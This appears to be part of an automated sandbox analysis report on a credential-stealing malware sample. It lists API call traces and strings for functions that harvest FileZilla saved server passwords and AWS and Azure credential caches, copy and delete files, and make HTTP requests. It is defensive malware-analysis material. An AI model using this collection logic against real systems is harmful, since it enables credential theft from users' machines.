Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2

strtok_s.MSVCRT ref: 0041047B
GetProcessHeap.KERNEL32(00000000,000F423F,00420DBF,00420DBE,00420DBB,00420DBA), ref: 004104C2
HeapAlloc.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004104C9
StrStrA.SHLWAPI(00000000,<Host>), ref: 004104E5
lstrlenA.KERNEL32(00000000), ref: 004104F3

Part of subcall function 00418A70: malloc.MSVCRT ref: 00418A78
Part of subcall function 00418A70: strncpy.MSVCRT ref: 00418A93

StrStrA.SHLWAPI(00000000,<Port>), ref: 0041052F
lstrlenA.KERNEL32(00000000), ref: 0041053D
StrStrA.SHLWAPI(00000000,<User>), ref: 00410579
lstrlenA.KERNEL32(00000000), ref: 00410587
StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 004105C3
lstrlenA.KERNEL32(00000000), ref: 004105D5
lstrlenA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 00410662
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 0041067A
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 00410692
lstrlenA.KERNEL32(00000000,?,?,00000000), ref: 004106AA
lstrcatA.KERNEL32(?,browser: FileZilla,?,?,00000000), ref: 004106C2
lstrcatA.KERNEL32(?,profile: null,?,?,00000000), ref: 004106D1
lstrcatA.KERNEL32(?,url: ,?,?,00000000), ref: 004106E0
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 004106F3
lstrcatA.KERNEL32(?,00421770,?,?,00000000), ref: 00410702
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410715
lstrcatA.KERNEL32(?,00421774,?,?,00000000), ref: 00410724
lstrcatA.KERNEL32(?,login: ,?,?,00000000), ref: 00410733
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410746
lstrcatA.KERNEL32(?,00421780,?,?,00000000), ref: 00410755
lstrcatA.KERNEL32(?,password: ,?,?,00000000), ref: 00410764
lstrcatA.KERNEL32(?,00000000,?,?,00000000), ref: 00410777
lstrcatA.KERNEL32(?,00421790,?,?,00000000), ref: 00410786
lstrcatA.KERNEL32(?,00421794,?,?,00000000), ref: 00410795
strtok_s.MSVCRT ref: 004107D9
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 004107EE
memset.MSVCRT ref: 0041083D

Strings

\AppData\Roaming\FileZilla\recentservers.xml, xrefs: 00410404
<Port>, xrefs: 00410526
profile: null, xrefs: 004106C8
browser: FileZilla, xrefs: 004106B9
url: , xrefs: 004106D7
password: , xrefs: 0041075B
<User>, xrefs: 00410570
login: , xrefs: 0041072A
<Host>, xrefs: 004104DC
<Pass encoding="base64">, xrefs: 004105BA

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
API String ID: 337689325-555421843
Opcode ID: 4fc848dbf87095acd12c42b60f0aab464385706ec0422a8f446ef3a48111bdb9
Instruction ID: 8daa67574ba642934e37c5269d194fb48a2cec37eebf9d0dac7d381e96a5dd97
Opcode Fuzzy Hash: 4fc848dbf87095acd12c42b60f0aab464385706ec0422a8f446ef3a48111bdb9
Instruction Fuzzy Hash: 65D17271E01108ABCB04EBF0ED56EEE7339AF54315F50855AF102B7095EF38AA94CB69

Function 048C4877 Relevance: 51.1, APIs: 34, Instructions: 114stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00424EC0), ref: 048C4883
lstrlen.KERNEL32(00424F70), ref: 048C488E
lstrlen.KERNEL32(00425038), ref: 048C4899
lstrlen.KERNEL32(004250F0), ref: 048C48A4
lstrlen.KERNEL32(00425198), ref: 048C48AF
GetProcessHeap.KERNEL32(00000000,?), ref: 048C48BE
RtlAllocateHeap.NTDLL(00000000), ref: 048C48C5
lstrlen.KERNEL32(00425240), ref: 048C48D3
lstrlen.KERNEL32(004252E8), ref: 048C48DE
lstrlen.KERNEL32(00425390), ref: 048C48E9
lstrlen.KERNEL32(00425438), ref: 048C48F4
lstrlen.KERNEL32(004254E0), ref: 048C48FF
lstrlen.KERNEL32(00425588), ref: 048C4913
lstrlen.KERNEL32(00425630), ref: 048C491E
lstrlen.KERNEL32(004256D8), ref: 048C4929
lstrlen.KERNEL32(00425780), ref: 048C4934
lstrlen.KERNEL32(00425828), ref: 048C493F
lstrlen.KERNEL32(004258D0), ref: 048C4968
lstrlen.KERNEL32(00425978), ref: 048C4973
lstrlen.KERNEL32(00425A40), ref: 048C497E
lstrlen.KERNEL32(00425AE8), ref: 048C4989
lstrlen.KERNEL32(00425B90), ref: 048C4994
strlen.MSVCRT ref: 048C49A7
lstrlen.KERNEL32(00425C38), ref: 048C49CF
lstrlen.KERNEL32(00425CE0), ref: 048C49DA
lstrlen.KERNEL32(00425D88), ref: 048C49E5
lstrlen.KERNEL32(00425E30), ref: 048C49F0
lstrlen.KERNEL32(00425ED8), ref: 048C49FB
lstrlen.KERNEL32(00425F80), ref: 048C4A0B
lstrlen.KERNEL32(00426028), ref: 048C4A16
lstrlen.KERNEL32(004260D0), ref: 048C4A21
lstrlen.KERNEL32(00426178), ref: 048C4A2C
lstrlen.KERNEL32(00426220), ref: 048C4A37
VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 048C4A53

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
String ID:
API String ID: 2127927946-0
Opcode ID: 5eea1aac99bf7e535a43d37b45fc3319ad1af7de06c44669e1522cdce20b9fba
Instruction ID: 905fd873511e16d3288428021d46829978a08571801fd398d5b97a85a5f2082d
Opcode Fuzzy Hash: 5eea1aac99bf7e535a43d37b45fc3319ad1af7de06c44669e1522cdce20b9fba
Instruction Fuzzy Hash: CE411E79740624ABD7109FE5FC4DADCBF70AB4C711BA08061F90A89150CBF593859B7D

Function 048D9E17 Relevance: 49.7, APIs: 33, Instructions: 212libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(006D72B8,006D6C04), ref: 048D9E58
GetProcAddress.KERNEL32(006D72B8,006D6FC8), ref: 048D9E71
GetProcAddress.KERNEL32(006D72B8,006D7044), ref: 048D9E89
GetProcAddress.KERNEL32(006D72B8,006D6C64), ref: 048D9EA1
GetProcAddress.KERNEL32(006D72B8,006D6C50), ref: 048D9EBA
GetProcAddress.KERNEL32(006D72B8,006D6CF8), ref: 048D9ED2
GetProcAddress.KERNEL32(006D72B8,006D6ED4), ref: 048D9EEA
GetProcAddress.KERNEL32(006D72B8,006D6D3C), ref: 048D9F03
GetProcAddress.KERNEL32(006D72B8,006D6FA0), ref: 048D9F1B
GetProcAddress.KERNEL32(006D72B8,006D6F48), ref: 048D9F33
GetProcAddress.KERNEL32(006D72B8,006D6DBC), ref: 048D9F4C
GetProcAddress.KERNEL32(006D72B8,006D6CE8), ref: 048D9F64
GetProcAddress.KERNEL32(006D72B8,006D700C), ref: 048D9F7C
GetProcAddress.KERNEL32(006D72B8,006D6AB0), ref: 048D9F95
GetProcAddress.KERNEL32(006D72B8,006D6F98), ref: 048D9FAD
GetProcAddress.KERNEL32(006D72B8,006D6C24), ref: 048D9FC5
GetProcAddress.KERNEL32(006D72B8,006D6E18), ref: 048D9FDE
GetProcAddress.KERNEL32(006D72B8,006D7034), ref: 048D9FF6
GetProcAddress.KERNEL32(006D72B8,006D6ABC), ref: 048DA00E
GetProcAddress.KERNEL32(006D72B8,006D6B2C), ref: 048DA027
GetProcAddress.KERNEL32(006D72B8,006D6CB0), ref: 048DA03F
LoadLibraryA.KERNEL32(006D6F50,?,048D6F07), ref: 048DA051
LoadLibraryA.KERNEL32(006D6B7C,?,048D6F07), ref: 048DA062
LoadLibraryA.KERNEL32(006D6B04,?,048D6F07), ref: 048DA074
LoadLibraryA.KERNEL32(006D6BDC,?,048D6F07), ref: 048DA086
LoadLibraryA.KERNEL32(006D6D28,?,048D6F07), ref: 048DA097
GetProcAddress.KERNEL32(006D70DC,006D6EAC), ref: 048DA0B9
GetProcAddress.KERNEL32(006D71FC,006D6E24), ref: 048DA0DA
GetProcAddress.KERNEL32(006D71FC,006D6BCC), ref: 048DA0F2
GetProcAddress.KERNEL32(006D72EC,006D6D94), ref: 048DA114
GetProcAddress.KERNEL32(006D71B0,006D6B28), ref: 048DA135
GetProcAddress.KERNEL32(006D71E0,006D6E14), ref: 048DA156
GetProcAddress.KERNEL32(006D71E0,0042072C), ref: 048DA16D

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad
String ID:
API String ID: 2238633743-0
Opcode ID: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
Instruction ID: beca0f7c335ab942db32e6602f19c630407590a5e7f04b3e13f62bf04159a62d
Opcode Fuzzy Hash: edf66d35e3c25c46ff42be0291b8a279c2bd212ca972e11257e66bc224b5ba57
Instruction Fuzzy Hash: AAA15DB5D0A2549FC344DFA8FC889567BBBA74D301718A61BF909C3674E734A640CF62

Function 048D0617 Relevance: 48.4, APIs: 32, Instructions: 363stringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 048DACB7: lstrcpy.KERNEL32(00420E1A,00000000), ref: 048DACFF

Part of subcall function 048D91D7: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 048D9202

Part of subcall function 048DAE97: lstrcpy.KERNEL32(00000000,?), ref: 048DAEE9
Part of subcall function 048DAE97: lstrcat.KERNEL32(00000000), ref: 048DAEF9

Part of subcall function 048DAE17: lstrcpy.KERNEL32(?,00420E1A), ref: 048DAE7C

Part of subcall function 048DAF27: lstrlen.KERNEL32(?,006D6BF0,?,004250DC,00420E1A), ref: 048DAF3C
Part of subcall function 048DAF27: lstrcpy.KERNEL32(00000000), ref: 048DAF7B
Part of subcall function 048DAF27: lstrcat.KERNEL32(00000000,00000000), ref: 048DAF89

Part of subcall function 048DAD17: lstrcpy.KERNEL32(?,00000000), ref: 048DAD5D

Part of subcall function 048CA377: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 048CA3A3
Part of subcall function 048CA377: GetFileSizeEx.KERNEL32(000000FF,?), ref: 048CA3C8
Part of subcall function 048CA377: LocalAlloc.KERNEL32(00000040,?), ref: 048CA3E8
Part of subcall function 048CA377: ReadFile.KERNEL32(000000FF,?,00000000,048C16F6,00000000), ref: 048CA411
Part of subcall function 048CA377: LocalFree.KERNEL32(048C16F6), ref: 048CA447
Part of subcall function 048CA377: CloseHandle.KERNEL32(000000FF), ref: 048CA451

Part of subcall function 048D9227: LocalAlloc.KERNEL32(00000040,-00000001), ref: 048D9249

strtok_s.MSVCRT ref: 048D06E2
GetProcessHeap.KERNEL32(00000000,000F423F,00420DBF,00420DBE,00420DBB,00420DBA), ref: 048D0729
RtlAllocateHeap.NTDLL(00000000), ref: 048D0730
StrStrA.SHLWAPI(00000000,00421710), ref: 048D074C
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048D075A

Part of subcall function 048D8CD7: malloc.MSVCRT ref: 048D8CDF
Part of subcall function 048D8CD7: strncpy.MSVCRT ref: 048D8CFA

StrStrA.SHLWAPI(00000000,00421718), ref: 048D0796
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048D07A4
StrStrA.SHLWAPI(00000000,00421720), ref: 048D07E0
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048D07EE
StrStrA.SHLWAPI(00000000,00421728), ref: 048D082A
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048D083C
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048D08C9
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048D08E1
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048D08F9
lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048D0911
lstrcat.KERNEL32(?,00421744), ref: 048D0929
lstrcat.KERNEL32(?,00421758), ref: 048D0938
lstrcat.KERNEL32(?,00421768), ref: 048D0947
lstrcat.KERNEL32(?,00000000), ref: 048D095A
lstrcat.KERNEL32(?,00421770), ref: 048D0969
lstrcat.KERNEL32(?,00000000), ref: 048D097C
lstrcat.KERNEL32(?,00421774), ref: 048D098B
lstrcat.KERNEL32(?,00421778), ref: 048D099A
lstrcat.KERNEL32(?,00000000), ref: 048D09AD
lstrcat.KERNEL32(?,00421780), ref: 048D09BC
lstrcat.KERNEL32(?,00421784), ref: 048D09CB
lstrcat.KERNEL32(?,00000000), ref: 048D09DE
lstrcat.KERNEL32(?,00421790), ref: 048D09ED
lstrcat.KERNEL32(?,00421794), ref: 048D09FC
strtok_s.MSVCRT ref: 048D0A40
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB7), ref: 048D0A55
memset.MSVCRT ref: 048D0AA4

Memory Dump Source

Source File: 00000000.00000002.2089886567.00000000048C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 048C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_48c0000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
String ID:
API String ID: 3689735781-0
Opcode ID: 098dc5743905a2ee9813f64f0b56af725ff5a500f78c5c8fd9e9f659a4e17eb6
Instruction ID: fb1e8b6c6ee3d0ef60ecc7c13ad9a6c9bb1978c1c2df069452af0646cc4455c0
Opcode Fuzzy Hash: 098dc5743905a2ee9813f64f0b56af725ff5a500f78c5c8fd9e9f659a4e17eb6
Instruction Fuzzy Hash: B6D15271D02218ABDB08EBF4DD45EEE7739AF54305F504A59E106E6090EFB4BA44CB62

Function 004059B0 Relevance: 46.0, APIs: 19, Strings: 7, Instructions: 493networkstringmemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
Part of subcall function 00404800: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
Part of subcall function 00404800: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
Part of subcall function 00404800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00405A48
StrCmpCA.SHLWAPI(?,02EB7320), ref: 00405A63
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405BE3
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,02EB7400,00000000,?,02E34B20,00000000,?,00421B4C), ref: 00405EC1
lstrlenA.KERNEL32(00000000), ref: 00405ED2
GetProcessHeap.KERNEL32(00000000,?), ref: 00405EE3
HeapAlloc.KERNEL32(00000000), ref: 00405EEA
lstrlenA.KERNEL32(00000000), ref: 00405EFF
memcpy.MSVCRT(?,00000000,00000000), ref: 00405F16
lstrlenA.KERNEL32(00000000), ref: 00405F28
lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405F41
memcpy.MSVCRT(?), ref: 00405F4E
lstrlenA.KERNEL32(00000000,?,?), ref: 00405F6B
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F7F
InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F9C
InternetCloseHandle.WININET(00000000), ref: 00406000
InternetCloseHandle.WININET(00000000), ref: 0040600D
HttpOpenRequestA.WININET(00000000,02EB7280,?,02EB6960,00000000,00000000,00400100,00000000), ref: 00405C48

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

InternetCloseHandle.WININET(00000000), ref: 00406017

Strings

S`A, xrefs: 00405A0F, 004060B7, 00405A97, 00405AA0, 00405B0E, 00405B85, 00405C83, 00405DC4, 00405B11, 00405B88, 00405C86, 00405DC7
S`A, xrefs: 004060CA
------, xrefs: 00405AE6
------, xrefs: 00405D9C
------, xrefs: 00405C5B
", xrefs: 00405D25
", xrefs: 00405E66

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
String ID: "$"$------$------$------$S`A$S`A
API String ID: 1406981993-1449208648
Opcode ID: ece7f536badaabeff24f30454e587c13eb1b05989c193d290bb1a0ec0f220d4a
Instruction ID: 528bda5bfb4e43d7cafc1c43cb8ffcda3f2e6465d8e228b0a039cdd5195e34d5
Opcode Fuzzy Hash: ece7f536badaabeff24f30454e587c13eb1b05989c193d290bb1a0ec0f220d4a
Instruction Fuzzy Hash: 1412FC71925128ABCB14EBA1DCA5FEEB379BF14714F00419EF10662091EF783B98CB59

Function 00414FC0 Relevance: 33.4, APIs: 10, Strings: 9, Instructions: 119stringCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00414FD7

Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B

lstrcatA.KERNEL32(?,00000000), ref: 00415000
lstrcatA.KERNEL32(?,\.azure\), ref: 0041501D

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414B7C
Part of subcall function 00414B60: FindFirstFileA.KERNEL32(?,?), ref: 00414B93

memset.MSVCRT ref: 00415063
lstrcatA.KERNEL32(?,00000000), ref: 0041508C
lstrcatA.KERNEL32(?,\.aws\), ref: 004150A9

Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC4), ref: 00414BC1
Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,00420FC8), ref: 00414BD7
Part of subcall function 00414B60: FindNextFileA.KERNEL32(000000FF,?), ref: 00414DCD
Part of subcall function 00414B60: FindClose.KERNEL32(000000FF), ref: 00414DE2

memset.MSVCRT ref: 004150EF
lstrcatA.KERNEL32(?,00000000), ref: 00415118
lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00415135

Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C00
Part of subcall function 00414B60: StrCmpCA.SHLWAPI(?,004208D3), ref: 00414C15
Part of subcall function 00414B60: wsprintfA.USER32 ref: 00414C32
Part of subcall function 00414B60: PathMatchSpecA.SHLWAPI(?,?), ref: 00414C6E
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,02EB23C0,?,000003E8), ref: 00414C9A
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE0), ref: 00414CAC
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CC0
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,00420FE4), ref: 00414CD2
Part of subcall function 00414B60: lstrcatA.KERNEL32(?,?), ref: 00414CE6
Part of subcall function 00414B60: CopyFileA.KERNEL32(?,?,00000001), ref: 00414CFC
Part of subcall function 00414B60: DeleteFileA.KERNEL32(?), ref: 00414D81

memset.MSVCRT ref: 0041517B

Strings

\.aws\, xrefs: 0041509D
*.*, xrefs: 004150B4
Azure\.aws, xrefs: 004150AF
\.IdentityService\, xrefs: 00415129
Azure\.IdentityService, xrefs: 0041513B
Azure\.azure, xrefs: 00415023
*.*, xrefs: 00415028
msal.cache, xrefs: 00415140
\.azure\, xrefs: 00415011

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
API String ID: 4017274736-974132213
Opcode ID: 08139e44e5d7f232419ca54b84d5d6bd78c899cf797d15b4c3395f2c57b04096
Instruction ID: 39229561bcf9e6d20be1630849a4938ad9d2aa6361ec20f439e2b4dca26d7b75
Opcode Fuzzy Hash: 08139e44e5d7f232419ca54b84d5d6bd78c899cf797d15b4c3395f2c57b04096
Instruction Fuzzy Hash: 3F41D6B5E4021867DB10F770EC4BFDD33385B60705F40485AB649660D2FEB8A7D88B9A

Function 0040CFF0 Relevance: 31.9, APIs: 21, Instructions: 374stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,02E34B50,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D083
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D1C7
HeapAlloc.KERNEL32(00000000), ref: 0040D1CE
lstrcatA.KERNEL32(?,00000000,02EB22B0,0042156C,02EB22B0,00421568,00000000), ref: 0040D308
lstrcatA.KERNEL32(?,00421570), ref: 0040D317
lstrcatA.KERNEL32(?,00000000), ref: 0040D32A
lstrcatA.KERNEL32(?,00421574), ref: 0040D339
lstrcatA.KERNEL32(?,00000000), ref: 0040D34C
lstrcatA.KERNEL32(?,00421578), ref: 0040D35B
lstrcatA.KERNEL32(?,00000000), ref: 0040D36E
lstrcatA.KERNEL32(?,0042157C), ref: 0040D37D
lstrcatA.KERNEL32(?,00000000), ref: 0040D390
lstrcatA.KERNEL32(?,00421580), ref: 0040D39F
lstrcatA.KERNEL32(?,00000000), ref: 0040D3B2
lstrcatA.KERNEL32(?,00421584), ref: 0040D3C1
lstrcatA.KERNEL32(?,00000000), ref: 0040D3D4
lstrcatA.KERNEL32(?,00421588), ref: 0040D3E3

Part of subcall function 0041AB30: lstrlenA.KERNEL32(00000000,?,?,00415DA4,00420ADF,00420ADB,?,?,00416DB6,00000000,?,02EB2270,?,004210F4,?,00000000), ref: 0041AB3B
Part of subcall function 0041AB30: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AB95

lstrlenA.KERNEL32(?), ref: 0040D42A
lstrlenA.KERNEL32(?), ref: 0040D439
memset.MSVCRT ref: 0040D488

Part of subcall function 0041AD80: StrCmpCA.SHLWAPI(00000000,00421568,0040D2A2,00421568,00000000), ref: 0041AD9F

DeleteFileA.KERNEL32(00000000), ref: 0040D4B4

Memory Dump Source

Source File: 00000000.00000002.2088321543.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2088321543.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.000000000051B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.0000000000526000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006D6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2088321543.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_kNp6KbvVoz.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocCopyDeleteProcessSystemTimememset
String ID:
